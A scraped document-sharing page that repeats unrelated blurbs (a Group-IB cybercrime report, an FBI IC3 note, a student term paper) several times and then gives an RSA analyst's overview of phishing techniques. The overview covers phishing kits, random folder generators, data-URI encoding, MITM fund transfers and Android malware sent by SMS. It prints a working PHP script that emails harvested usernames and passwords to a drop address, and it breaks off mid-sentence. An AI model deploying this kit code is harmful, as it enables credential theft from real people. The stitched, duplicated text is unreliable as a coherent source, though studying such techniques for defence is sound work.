The document provides an overview of phishing techniques used over the past decade based on investigations by an RSA FraudAction forensic analyst. It describes how phishing campaigns are typically set up and distributed, as well as various technical methods used, including: generating random folder paths to host phishing sites and avoid detection; encoding phishing pages in email attachments or URLs; and using Man-in-the-Middle techniques to forward stolen credentials to legitimate sites behind the scenes. The document outlines common motivation and cash-out methods for phishers, such as selling stolen data or using money mules. It also discusses evolving tactics like multi-branded tax refund scams and deploying phishing sites in bulk across numerous domains and paths.
The analysis paper was created as a course work of Master of Science at the University of Illinois at Springfield. The paper gives an overview of a cybercrime investigation carried out by FBI famously known by its sobriquet PHISH PHRY that dealt with one of the most notorious phishing scams of recent times.
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats- Mark - Fullbright
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
Phishing is a cybercrime in which a target is contacted by email, or message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking, and any bank card details, and passwords.
To know more: https://www.infopercept.com/phishing-a-game-of-deception
The analysis paper was created as a course work of Master of Science at the University of Illinois at Springfield. The paper gives an overview of a cybercrime investigation carried out by FBI famously known by its sobriquet PHISH PHRY that dealt with one of the most notorious phishing scams of recent times.
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats- Mark - Fullbright
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
Phishing is a cybercrime in which a target is contacted by email, or message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking, and any bank card details, and passwords.
To know more: https://www.infopercept.com/phishing-a-game-of-deception
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
The papers for publication in The International Journal of Engineering& Science are selected through rigorous peer reviews to ensure originality, timeliness, relevance, and readability.
In the modern world, the high technology and the Internet carry a huge favor, greatly improving our lives and opening up new opportunities.
But unfortunately, they also serve as a weapon or infrastructure for the crime.
It is not only about computer crimes which are usually associated with high technology. Nowdays various criminal acts such as fraud, offences related to corruption, sales of illegal drugs, counterfeit products and medicines, economic crimes, crimes related to violation of intellectual property rights (digital piracy) are committed by means of high technology. Also, terrorists and extremists maintain communication and coordinate their actions using modern technologies.
All these factors lead to an increase of the number of crimes and active development of the black market and the shadow economy around the world.
Society, the state and the companies found themselves not ready for such a rapid change of technologies and criminal environment.
Awareness of high-tech crime problem is very important but requires a deep technical analysis and understanding of criminal schemes. The high technologies allow crime to act quickly and anonymously. It has no rules and bureaucracy. Crime now has an opportunity to ignore borders and freely break the law. Use of cryptocurrencies and the deep Web contribute to the development of high-tech crime.
Methods used by the classical cybercriminals move on to the arms of organized crime which allows it to commit more audacious crimes. Also the instruments developed by cybercriminals used for public and industrial espionage.
We aim at providing modern society with an understanding of high-tech crime that would make a proper risk estimation possible, give the ability to take the necessary measures to minimize it, provide with the choice of the methods of countermeasures, would allow adequate collaboration and improve the legislation around the world.
The other important thing is understanding of economics of those crimes. The main goal of crime is receiving illegal income and there is no surprise that market for high-tech crime on its turnover will soon be close to drug-dealing. Hi-Tech crimes cannot be touched and cybercriminals do not look negatively in the opinion of modern society.
Group-IB continuously conducts research and provides analytical information about the current status and changes not only cyber-threats but cybercrime as well. We hope that this report and other analytical information will be used in strategic planning and rapid response to current risks and security threats.
In this report we focus on high-tech crimes associated with traditional computer crime. However, as noted above, the methods used by traditional computer crime, instruments of commission of crimes and ensuring anonymity will be adopted by representatives of usual organized crime.
Every year Group IB releases reports on the development of high tech and cyber-crime, describing new tendencies and interesting emerging trends from recent months and forecasting future threats. This report covers the second half of 2014 and the first half of 2015.
In last year’s report we primarily forecast the increase in targeted attacks on banks. This has been mostly accurate and accordingly, in the second half of last year, the Anunak hacking group, also known as Carbanak, carried out a series of thefts for hundreds of millions of Rubles from the banking sector. However, after the publication of the co-authored Group IB and Fox-IT report, which outlined the group’s methodology, they ceased their activity.
Despite this, as predicted, new hacking groups have appeared conducting similar attacks, for example, the much discussed targeted attack on a Kazan based bank, which resulted in volatility on the currency exchange market of over 10 Rubles to the US Dollar for a short period.
Our predictions of increased attacks on ATMs were also correct. Group IB has discovered new Trojans and insider fraud, and also new equipment, including Blackbox, a tool which hackers developed and installed on cash machines, allowing them to receive remote access to systems.
Following research and analysis of the threats to mobile devices, Group IB predicted an increase in the amount of mobile Trojans that allow hackers to automatically transfer money from bank accounts, sidestepping the most advanced bank security systems. This prediction was correct in assessing the speed of development in this area of fraud and accordingly we have allocated a specific section of this year’s report to this growing issue.
Another major forecast was a decrease in the amount of thefts from individuals, using Trojans which reroute users to phishing sites. Thanks to the arrest of participants in one of the most aggressive hacking groups using this scheme, the amount of thefts was not just lowered but completely stopped. More details are provided in the Group IB completed investigations and arrested criminals section of this report.
We also predicted an increase in the attacks on Russian internet and digital resources by hacktivists and again were correct. Hackers affiliated with ISIS carried out over 600 attacks which Group IB analysed and assessed in a separate report on their international activity.
All product and company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
The FBI is the lead federal agency for investigating malicious cyber activity by criminals, nation-state adversaries, and terrorists. To fulfill this mission, the FBI often develops resources to enhance operations and collaboration. One such resource is the FBI’s Internet Crime Complaint Center (IC3) which provides the public with a trustworthy and convenient mechanism for reporting information concerning suspected Internet-facilitated criminal activity. At the end of every year, the IC3 collates information collected into an annual report.
Credit is due to all original authors and no financial gain was made from the blog, Simply sharing an interesting story for educational purposes,
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
The papers for publication in The International Journal of Engineering& Science are selected through rigorous peer reviews to ensure originality, timeliness, relevance, and readability.
In the modern world, the high technology and the Internet carry a huge favor, greatly improving our lives and opening up new opportunities.
But unfortunately, they also serve as a weapon or infrastructure for the crime.
It is not only about computer crimes which are usually associated with high technology. Nowdays various criminal acts such as fraud, offences related to corruption, sales of illegal drugs, counterfeit products and medicines, economic crimes, crimes related to violation of intellectual property rights (digital piracy) are committed by means of high technology. Also, terrorists and extremists maintain communication and coordinate their actions using modern technologies.
All these factors lead to an increase of the number of crimes and active development of the black market and the shadow economy around the world.
Society, the state and the companies found themselves not ready for such a rapid change of technologies and criminal environment.
Awareness of high-tech crime problem is very important but requires a deep technical analysis and understanding of criminal schemes. The high technologies allow crime to act quickly and anonymously. It has no rules and bureaucracy. Crime now has an opportunity to ignore borders and freely break the law. Use of cryptocurrencies and the deep Web contribute to the development of high-tech crime.
Methods used by the classical cybercriminals move on to the arms of organized crime which allows it to commit more audacious crimes. Also the instruments developed by cybercriminals used for public and industrial espionage.
We aim at providing modern society with an understanding of high-tech crime that would make a proper risk estimation possible, give the ability to take the necessary measures to minimize it, provide with the choice of the methods of countermeasures, would allow adequate collaboration and improve the legislation around the world.
The other important thing is understanding of economics of those crimes. The main goal of crime is receiving illegal income and there is no surprise that market for high-tech crime on its turnover will soon be close to drug-dealing. Hi-Tech crimes cannot be touched and cybercriminals do not look negatively in the opinion of modern society.
Group-IB continuously conducts research and provides analytical information about the current status and changes not only cyber-threats but cybercrime as well. We hope that this report and other analytical information will be used in strategic planning and rapid response to current risks and security threats.
In this report we focus on high-tech crimes associated with traditional computer crime. However, as noted above, the methods used by traditional computer crime, instruments of commission of crimes and ensuring anonymity will be adopted by representatives of usual organized crime.
Every year Group IB releases reports on the development of high tech and cyber-crime, describing new tendencies and interesting emerging trends from recent months and forecasting future threats. This report covers the second half of 2014 and the first half of 2015.
In last year’s report we primarily forecast the increase in targeted attacks on banks. This has been mostly accurate and accordingly, in the second half of last year, the Anunak hacking group, also known as Carbanak, carried out a series of thefts for hundreds of millions of Rubles from the banking sector. However, after the publication of the co-authored Group IB and Fox-IT report, which outlined the group’s methodology, they ceased their activity.
Despite this, as predicted, new hacking groups have appeared conducting similar attacks, for example, the much discussed targeted attack on a Kazan based bank, which resulted in volatility on the currency exchange market of over 10 Rubles to the US Dollar for a short period.
Our predictions of increased attacks on ATMs were also correct. Group IB has discovered new Trojans and insider fraud, and also new equipment, including Blackbox, a tool which hackers developed and installed on cash machines, allowing them to receive remote access to systems.
Following research and analysis of the threats to mobile devices, Group IB predicted an increase in the amount of mobile Trojans that allow hackers to automatically transfer money from bank accounts, sidestepping the most advanced bank security systems. This prediction was correct in assessing the speed of development in this area of fraud and accordingly we have allocated a specific section of this year’s report to this growing issue.
Another major forecast was a decrease in the amount of thefts from individuals, using Trojans which reroute users to phishing sites. Thanks to the arrest of participants in one of the most aggressive hacking groups using this scheme, the amount of thefts was not just lowered but completely stopped. More details are provided in the Group IB completed investigations and arrested criminals section of this report.
We also predicted an increase in the attacks on Russian internet and digital resources by hacktivists and again were correct. Hackers affiliated with ISIS carried out over 600 attacks which Group IB analysed and assessed in a separate report on their international activity.
All product and company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
The FBI is the lead federal agency for investigating malicious cyber activity by criminals, nation-state adversaries, and terrorists. To fulfill this mission, the FBI often develops resources to enhance operations and collaboration. One such resource is the FBI’s Internet Crime Complaint Center (IC3) which provides the public with a trustworthy and convenient mechanism for reporting information concerning suspected Internet-facilitated criminal activity. At the end of every year, the IC3 collates information collected into an annual report.
Credit is due to all original authors and no financial gain was made from the blog, Simply sharing an interesting story for educational purposes,
company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
Presentación sobre los términos básicos del proceso de investigación y el método científico, con el objeto de brindar información concisa en cuanto a estas terminologías.
need help with a term paper 8 pages Write a term paper that discusse.pdfanjandavid
need help with a term paper 8 pages Write a term paper that discusses the risks of pharming and
phishing with respect to identity theft, including spam emails claiming to come from well-known
companies and financial institutions. Including in your paper a discussion of some of the current
techniques being deployed to reduce pharming and phishing, including how effective they are\".
Solution
Pharming:
Pharming (pronounced ‘farming’) is a form of online fraud which is similar to phishing as these
guyz rely upon the same bogus websites and theft of confidential information. However, where
phishing will forward the user to the website through ‘bait’ in the form of a phony email or link,
pharming re-directs victims to the bogus site even if the victim has typed the correct web
address. This is often applied to the websites of well known banks or e-commerce sites, which
considerably dreadful.
Phissing:
Phishing is a form of fraud in which the criminals will try to learn information such as login
credentials or account information by masquerading as a reputable entity or person in email, IM
or other communication channels.Phishing email messages, websites, and phone calls are
designed to steal money. Online frauds can do this by installing malicious software on your
computer. It is a type of an email that falsely claims to be a legitimate enterprise in an attempt to
scam the user into surrendering private information.
Difference between Phissing and Pharming:
Both Phissing and Pharming are entirely two different concepts that are applied to steal the
customer information online.
While pharming is still considered a subset of phishing, it refers to a specific type of phishing
using DNS hijacking or poisoning to forward the user\'s browser to fraudulent sites or servers.
Pharming was keep on increasing from 2005 but has decreased slightly this year due to increased
diligence of domain controls, and is therefore employed less than the phishing exploits
mentioned above.
Special Notes:
From February 2005 to August 2005, worldwide there was a large number of pharming attacks,
due to common misconfigurations of DNS servers that made them accept the poison. While we
still see a trickle of pharming attacks today, most DNS servers have improved their poisoning
defenses, thereby lowering the incident of attacks. Don\'tget fooled, though, they are still out
there and we have to be diligent. If you run a Windows-based DNS server, make sure you have
enabled the \"Secure Cache Against Pollution\" option in the configuration GUI (the default for
recent versions of Windows DNS server). Also, never use Windows DNS servers configured to
forward requests through BIND 4 or 8. Windows DNS servers acting as forwarders should
always go through BIND 9, which can cleanse potentially poisoned records.
Risk of Phissing:
We can come to some general conclusions on the business risks of phishing attacks based on this
year\'s rash of privacy breaches. Phishing attacks ended in per.
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
Running head HOW TO AVOID INTERNET SCAMS AT THE WORKPLACE 1 .docxwlynn1
Running head: HOW TO AVOID INTERNET SCAMS AT THE WORKPLACE 1
How to avoid internet scams at the workplace
Christophe Bassono
CIST3000: Advanced Composition IS&T
Amanda L. Gutierrez, M.S. & M.A.
UNO-Fall 2018
HOW TO AVOID INTERNET SCAMS AT THE WORKPLACE 2
Online Fraud: How to Avoid Internet Scams in the Workplace
This section outlines how the researcher envisions presenting the report. The outline
demonstrates the different sections in which the report will be broken into and the
information that will be contained in each section
Introduction
Definition
Online fraud refers to deceitful schemes that are done using the internet. Online fraud may
come in the form of financial theft, identity theft or a combination of both.
History of Online Fraud
An influx of online fraud began to be experienced in the 1990s with the increased technology
use and e-commerce. In the beginning, online fraud was done by using the names of famous
celebrities of the time to commit internet crimes. Over time, more technical and sophisticated
plans were developed such as creating card-generator applications with real credit card
numbers, setting up dummy merchant websites and mass identity theft. Today, despite
attempts by various governments to regulate and mitigate online fraud, more sophisticated
online fraud schemes have been established ranging from credit card fraud to phishing,
hacking, and identity theft (Saeger & Probert, 2015).
In the recent past, computer fraud has evolved through a series of advancements outplaying
the traditional security defenses such as the two-factor authentication, antivirus, and SSL
encryption in the process. Zeus and SpyEye are the most common attack tools used by
hackers since they support the gathering of vast volumes of extremely sensitive
authentication data. It has been established that no single application is immune to attacks
and the malicious attackers are focusing more on online banking accounts because they offer
HOW TO AVOID INTERNET SCAMS AT THE WORKPLACE 3
most direct payoff. Online fraud is based on three core technologies: the botnet controllers
capable of handling hundreds of thousands of bots, highly effective data collection, and
sophisticated Trojans that are updateable.
Form grabbing for PCs running IE/Windows has been a simplified approach for fraud. The
technique helps attackers to extract data within browsers. The deployment of form grabbing
on compromised PCs allowed hackers to obtain numerous numbers of online bank account
IDs and passwords. The password-based authentication was termed no longer safe for online
banking prompting the introduction of two-factor authentication (Mellinger, 2011).
Nevertheless, criminals still found the loophole that helps them to challenge the security of
two-factor authentication through web injects. Malicious attackers that promote online fraud
have created various techniques.
Phishing is an attack that deals with social engineering system to illegally get and utilize another person's information for the benefit of authentic site for possess advantage (e.g. Take of client's secret word and Visa precise elements during online correspondence). It is influencing all the significant areas of industry step by step with a considerable measure of abuse of client qualifications. To secure clients against phishing, different hostile to phishing procedures have been suggested that takes after various methodologies like customer side and server side insurance. In this paper we have considered phishing in detail (counting assault process and grouping of phishing assault) and investigated a portion of the current sites to phishing strategies alongside their points of interest and disadvantages.
Improving Phishing URL Detection Using Fuzzy Association Miningtheijes
Phishing is the process to obtain sensitive information such as usernames, passwords, and credit card details by disguising as a trustworthy entity by the use of an electronic communication. Phishing attack continues to pose a solemn risk for web users and annoying threat within the field of electronic commerce. The Phishing detection using fuzzy and binary matrix construction method focuses on discerning the significant features that discriminate between legitimate and phishing URLs. The significant features are extracting the number of dots, length of the host etc., from each URL. These features are then subjected to associative rule mining-apriori and predictive apriori. The rules obtained are interpreted to emphasize the features that are more prevalent in phishing URLs. The key factors for the phished URLs are number of slashes in the URL, dot in the host portion of the URL and length of the URL. The pitfall of binary matrix method is the time complexity. So it impacts the overall speed of the system. The fuzzy based logic association rule mining algorithm was proposed to classify the legitimate and phishing URLs based on the features. The extracted features are converted to fuzzy membership values as “Low”,’ Medium’ and “High”. By applying association rule mining algorithm the rules are generated to detect the phishing URLs. The fuzzy based methodology provides efficient and high rate of phishing detection of URLs
2. 2
TABLE OF CONTENTS
Introduction............................................................................................................3
How to Set up a Phishing Campaign...........................................................................3
Fundamentals.......................................................................................................3
How Does Phishing Work in the Real World?.............................................................4
Motivation - How Do fraudsters Cash Out? ...............................................................5
The Many Schemes and Techniques of Phishing...........................................................5
The Tax Refund Ploy - Multi-branded Phishing ..........................................................5
Bulk Phishing Campaigns .......................................................................................5
Random Folder Generators.....................................................................................6
Local HTML Scheme ..............................................................................................8
BASE64 encoded Phishing in a URL .........................................................................9
Phishing with MITM capabilities...............................................................................9
Phishing Plus Mobile Malware in India .................................................................... 12
Fast-Flux Phishing............................................................................................... 15
Additional Phishing Techniques ............................................................................. 16
3. 3
INTRODUCTION
Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have
investigated, and also explains the techniques and inner workings of some recently seen schemes.
HOW TO SET UP A PHISHING CAMPAIGN
There is nothing complicated about setting up a phishing campaign. Phishing sites, like any
website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and
‘back-end’ (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a
phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate
customer login pages (front-end), where the action script (that handles the submitted
information) is different from the legitimate one. Owing to this simplicity in the preparation
process, phishing was, is, and will probably remain one of the most desirable scam techniques
performed by fraudsters.
FUNDAMENTALS
What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the
help of additional client-side scripting/markup languages such as JavaScript and CSS. These
components are responsible for presenting text, pictures, and other graphics. In addition, PHP
(Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to
perform programming tasks, and fraudsters love it! PHP is a relatively simple to write server-side
scripting language, and it is used by most websites today.
In every phishing site, there is an information form that victims are prompted to fill with
requested details. In HTML, forms are composed like the following example:
<form method=”POST” action=”getdata.php”>
Username: <input type=”text” name=”username” /> <br/>
Password: <input type=”password” name=”password” /> <br/><br/>
<input type=”submit” value=”Login” />
</form>
The example login form above contains two data fields: Username and Password, defined by the
input tag. The third input has a type defined as submit with a value defined as Login – this means
that it will appear on the login screen as a submit button labeled Login. The form tags at the
beginning and end of the script define a form with these fields. The form tag attributes method
and action determine how the data is going to be handled when victim clicks the Login button –
the data will be submitted to the getdata.php handling script via an HTTP POST request.
How do fraudsters usually prepare all of the above? They copy the HTML source code of a
legitimate site’s pages, and change the action attribute to a script they’ve written (usually in
PHP). The easy method is just to get the submitted data and forward it to fraudster’s email
address (a.k.a. the drop email). Here’s an example of a getdata.php script:
<?php
$username = $_POST[‘username’];
$password = $_POST[‘password’];
4. 4
$message = “-----[Best HaXoR Ever]-----n”;
$message .= “Username: $usernamen”;
$message .= “Password: $passwordn”;
$message .= “-----[Best HaXoR Ever]-----n”;
$subject = “Phished data”;
mail(“besthaxor@dropemail.com”, $subject, $message);
?>
Although most phishing sites still work in this simplified manner, during the last decade we’ve
seen more advanced phishing techniques develop and evolve.
HOW DOES PHISHING WORK IN THE REAL WORLD?
Being a simple way to do fraud, phishing usually doesn’t attract sophisticated threat actors. In
some cases, they don’t even possess any programming knowledge. Phishing sites are commonly
distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain
all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop
emails in the relevant files of the kit. It is very comfortable and easy for them to use. However,
distributors or kit developers don’t spend their precious time just to make their ‘clients’ the
fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that
forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for
example, if 100 fraudsters use these ‘infected’ kits distributed by single kit author, he stands to
harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online
100 times himself.
Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to
make it available online. Here are two commonly used options for deployment:
Use a hacked website
Buy a site/domain
The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either
hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of
such a site provides the fraudster with a link to a ‘backdoor’ script (also in PHP) also known as a
shell that allows them to control and manage the site, uploading and deploying the phishing kit
resources.
When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to
distribute it to potential victims. Distribution of phishing URLs is commonly performed via email
messages. However, occasionally fraudsters can be more creative and use additional distribution
vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email
addresses are traded and sold in underground forums, and often the price depends on how good
that list is. For example, how close a match there is between the email addresses of people from a
geographic area that matches the targeted entity, and how many of them are active or online, can
affect the price. If fraudster is targeting a British bank, a verified active email address owned by
British citizens will fetch a higher price.
5. 5
MOTIVATION - HOW DO FRAUDSTERS CASH OUT?
Not every financial institution becomes a fraudster’s target. The main qualifying factor is either a
security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process.
For example, knowing that phishing for PII (Personally Identifiable Information) data such as
mother’s maiden name and date of birth tied together with other personal details can help in
transferring money from a victim’s account elsewhere - will definitely draw a scammer’s attention.
Another option is fraudsters selling stolen data in the underground rather than trying to cash-out
the scam by themselves. This also offers the advantage of avoiding drawing attention from law
enforcement authorities and company security departments. The buyers are usually people who
are well versed with how to cash-out, and are also willing to take on the risks involved. One more
option is fraudsters collaborating with ‘money-mules’. The money is transferred to a ‘mule’
account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to
an ATM, draw the stolen money, and transfer it back to the first fraudster via a money
transferring service (Western Union, MoneyGram etc.). Another cashout scheme is purchasing
various products online using stolen credentials, and then re-selling the items. These are just few
examples of common cashout techniques.
THE MANY SCHEMES AND TECHNIQUES OF PHISHING
THE TAX REFUND PLOY - MULTI-BRANDED PHISHING
One phishing scam that Phishers love to use is to bait victims with a supposed tax refund
notification via email - pretending to come from an official government tax/revenue service in
different countries. When victims follow the link, they see a phishing website that has the same
look and feel of the legitimate revenue service site of their country, with a list of all the banks in
that region. The victim is prompted to select their bank and enter personal information to receive
a refund. This ploy enables fraudsters to steal data from customers at several banks at once and
increase their fraud coverage.
BULK PHISHING CAMPAIGNS
Another popular trend is performing phishing campaigns in bulk form. This means that rather than
deploying a single phishing website that is eventually sent to victims, fraudsters deploy them in
bulk, and distribute URLs randomly among phishing emails. This tactic increases the phishing
site’s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual
phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the
bulk scheme could encompass dozens of hijacked websites with several phishing directories on
each one, resulting in hundreds of phishing websites. For example:
http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html
7. 7
Here is a generic example - the initial link in the phishing email looks like this:
http://somesite.net/folder1/folder2/index.php
The PHP code in the snapshot below is an example of a random folder-generating script.
index.php is a PHP script that creates a random folder and copies all the required resource files
from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In
some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive
sitting in the ‘base’ directory of the phishing campaign, and deploys them as is, using the name of
the archive folder.
Random name
generating function
Randomize the name
some more
Logging every access in
file including IP, date, and
browser type
File copying function
Base directory - contents are copied from here
Copy the contents to generated folder and redirect to it
Phishing
email • Victim follows a folder-generating URL
Folder-
generating
script
• New randomly-named folder is generated
• Required files are copied from base directory to
new folder
• Victim is redirected to newly generated URL
Newly
generated
folder
• Phishing site is presented to
victim
8. 8
This scheme is simple to operate, but it complicates detection and shutdown efforts much like
other schemes described here. When one randomly deployed phishing URL is detected, it might be
deleted in minutes, which can mislead security personnel into thinking that the site has been
brought down. In actual fact, the site remains active and online, simply waiting for a new victim
to access the initial link. In order to handle these cases effectively, it is crucial to detect and
shutdown the ‘base’ directory (or archive) that contains initial phishing site and resources.
LOCAL HTML SCHEME
The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached
to an email message. Victims are prompted to open it and fill out their personal data. The
phishing site contents are placed in a single HTML file (except for the data handling script and
drop point URL that are incorporated in the form tag action attribute described earlier). The script
can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website.
In both cases, the data is usually sent to the fraudster’s drop email.
Below is a snapshot of Part of a Local HTML contents (form) with a remote drop point URL
From a cyber-security perspective, it may be difficult to shut-down the site when the drop script is
hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank
page is normally displayed), causing hosting facilities to think it is offline. On the other hand,
online form services are more cooperative in shutting down fraudster accounts.
9. 9
BASE64 ENCODED PHISHING IN A URL
Most major browsers today support a feature called data URI scheme. This feature enables
encoding the webpage content with BASE64 encoding into a string seen in browser address bar.
Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in
regular online hosted phishing. When hosted online, it helps scammers to conceal the main
phishing URL. The data URI is injected into the address bar using the JavaScript’s window.location
property or the HTML meta-refresh.
The screenshot below shows the data URI as it appears in address bar.
This is an example of the script for injecting the data URI into the browser address bar.
PHISHING WITH MITM CAPABILITIES
Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most,
and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that
while the victim is interacting with a phishing site, behind the scenes and not visible to the victim,
the phishing site communicates with and performs actions on the legitimate site. This capability is
implemented with PHP cURL module. The cURL is used to transfer data through various protocols
including HTTP. To develop a script that imitates the user’s actions on a legitimate site, some
reverse engineering is required on the part of the fraudster to understand which requests and
data are forwarded to the legitimate site.
10. 10
Below is a code sample illustrating the cURL object used for communicating with the legitimate
online-banking site.
The script in the snapshot below is a cURL class used for communicating with the legitimate online
banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).
11. 11
The config.php in the snapshot below contains the fraudster’s account used to receive the stolen
funds transfer.
Another part of the phishing script, seen below, uses the cURL object to transfer funds from the
victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown
above)
The MITM phishing scheme offers a fraudster many advantages – the fraudster can:
Login to the legitimate site to check the validity of stolen credentials
Browse the victim’s account after login to view the account balance
Grab additional personal information such as phone number, address, etc.
In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing
site’s original IP address and use the desired country IP to match that of the victim’s locale. This
results in a low profile in fraud monitoring system logs that flag suspicious activity if actions
carried out on the legitimate site are detected as originating from a region other than the
customer’s or the financial institution’s website locale. Moreover, there are cases where the
phishing kit checked the victim’s account balance, and when it was higher than a given amount, it
transferred the funds to a ‘mule’ account at the same bank through the legitimate site.
These kits/phishing sites are relatively rare as they require higher level coding skills and reverse
engineering of the legitimate websites.
In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario,
the funds in the account are transferred out almost instantly, making it a very serious threat in
cyber-space.
12. 12
PHISHING PLUS MOBILE MALWARE IN INDIA
Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The
Tax Refund scheme described earlier, that operates via a spoofed government revenue service
site, was recently modified to include an SMS message sent to the victim’s phone at the end of
the phishing process. The SMS contains a link that downloads and deploys a malicious APK
(Android mobile malware archive).
This new ploy makes use of a number of schemes and techniques described earlier, including a
random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in
the phishing emails leads victims to a redirection URL (performed via the BASE64 data URI). That
URL leads to an outer-frame site, using a script that communicates with a remote SQL database
to retrieve the inner-frame URL.
Phishing
email
•Victim clicks on
redirection link
Redirection
•Victim is redirected to outer-frame URL
•The redirecting source-code is obfuscated
with Unescape
•Redirecting code executes using data URI
Outer-frame
•Communicates with SQL database
to get inner-frame URL
•Presents inner-frame hosted on
URL different from outer-frame
Inner-frame
(folder-
genarator)
•Randomly named folder is generated
in random parent directory
•Victim is redirected to a new folder
Phishing
site
•Victim is prompted to select a bank
•Victim is prompted to enter personal data
including phone number
•Compromised data is sent to remote drop
URL
Victim
receives
short-URL
link via SMS
•The link leads to URL for downloading
malicious Andoid application
•Once APK is installed, victim's data on
smartphone iscompromised
13. 13
The snapshot below shows part of the outer-frame code – communicating with a remote SQL
database.
The inner-frame phishing URL generates a random folder in a random parent directory, which is
different from the usual folder-generators that create a new folder under the same path. The
phishing site prompts the victims to choose their bank from a long list of Indian banks to begin
the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.
14. 14
The kit uses a configuration file containing URLs for the resources needed by the phishing site:
A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing
the images from the legitimate site which can trigger detection
A drop URL that receives and logs stolen data
A URL with the SMS sending script for the malicious APK
A short URL that is sent to victims
The last page file that victims see at the end of the phishing process
The code snapshot below is an example of the phishing site configuration file.
Once the victim finishes going through all the phishing pages, the folder is deleted. To add further
spice to this scheme, upon entering their phone number in this site, the victim receives an SMS
message with a link prompting the download of a malicious APK file (Android application) under
the pretense of ‘mobile verification’.
The random URL generation where links are deleted and created per victim complicates detection
and shut-down by cyber security services. The impact of this trend is beyond ‘regular’ phishing,
since at the end of the process, the victim’s phone is infected by a malicious application. That
mobile malware application keeps on stealing data from the phone long after the personal data
has been phished via a simple phishing site. Since many banks today employ two-factor
authentication using SMS messages for online banking, this malicious app can be even more
harmful – allowing the fraudster control over the phone and the second channel for
authentication.
15. 15
FAST-FLUX PHISHING
One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated
are commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late).
These are usually phishing sites hosted on Fast-Flux networks – phishing attack domains that are
hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in
order to bring down these attacks, our analysts can only contact the registrars, as contacting the
ISP/Hosting would not help to get to the root problem. Domains are often generated automatically
in this scheme for the sole purpose of hosting phishing and malware. Each domain contained
dozens of URLs targeting several entities, making campaigns very profitable for the scam authors.
Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets –
many infected ‘zombie’ computers. It involves a DNS with short TTL of its records in order to
achieve IP addresses randomization.
This scheme is not as common recently as it was in the past.
16. 16
ADDITIONAL PHISHING TECHNIQUES
In addition to the more notable and prevalent phishing schemes we have described, there are a
few more techniques that are available in the phishing arsenal that are not as well known, but are
